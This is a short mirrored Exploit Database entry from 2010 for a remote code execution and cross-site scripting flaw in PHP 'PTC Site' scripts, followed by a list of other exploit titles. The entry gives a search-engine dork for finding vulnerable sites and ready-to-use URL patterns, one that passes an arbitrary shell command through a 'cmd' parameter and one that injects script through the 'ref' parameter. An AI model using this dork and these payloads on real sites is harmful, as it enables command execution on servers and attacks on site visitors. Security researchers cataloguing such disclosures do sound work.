PTC Site’s – Remote Code Execution / Cross-Site Scripting

Exploit Database
9 阅读

作者： CrazyMember

日期： 2010-05-30
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/12808/

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

@Title: PTC Site's RCE/XSS Vulnerability
@Vendor: http://www.ptcsites4sale.info & and etc...:D
@Author: CrazyMember
@SPC Thanks: XroGuE 4 r3p0r7 :P 
@Dork:"intext:Warning: passthru()" "inurl:view=help"

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

@Bug: http://[site]/index.php?view=help&faq=1&ref=[RCE/XSS/HTML]

Demo: 

#http://[site]/index.php?view=help&faq=1&ref=marykarma&cmd=[Your Commond]
#http://[site]/index.php?view=help&faq=1&ref=[Your ScripT]

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

last Exploits
PTC Site’s – Remote Code Execution / Cross-Site Scripting的更多信息

JSPMyAdmin 1.1 – Multiple Vulnerabilities：
Escort Agency CMS – Blind SQL Injection：
CSZ CMS 1.2.9 – Multiple Cross-Site Scripting：
BASE 1.4.5 – ‘base_qry_main.php?t_view’ SQL Injection：
Joomla! Component Machine – Multiple SQL Injections：
chatNow – Multiple Vulnerabilities：
Joomla! Component mod_VisitorData 1.1 – Remote code Execution：
MyBB Downloads 2.0.3 – SQL Injection：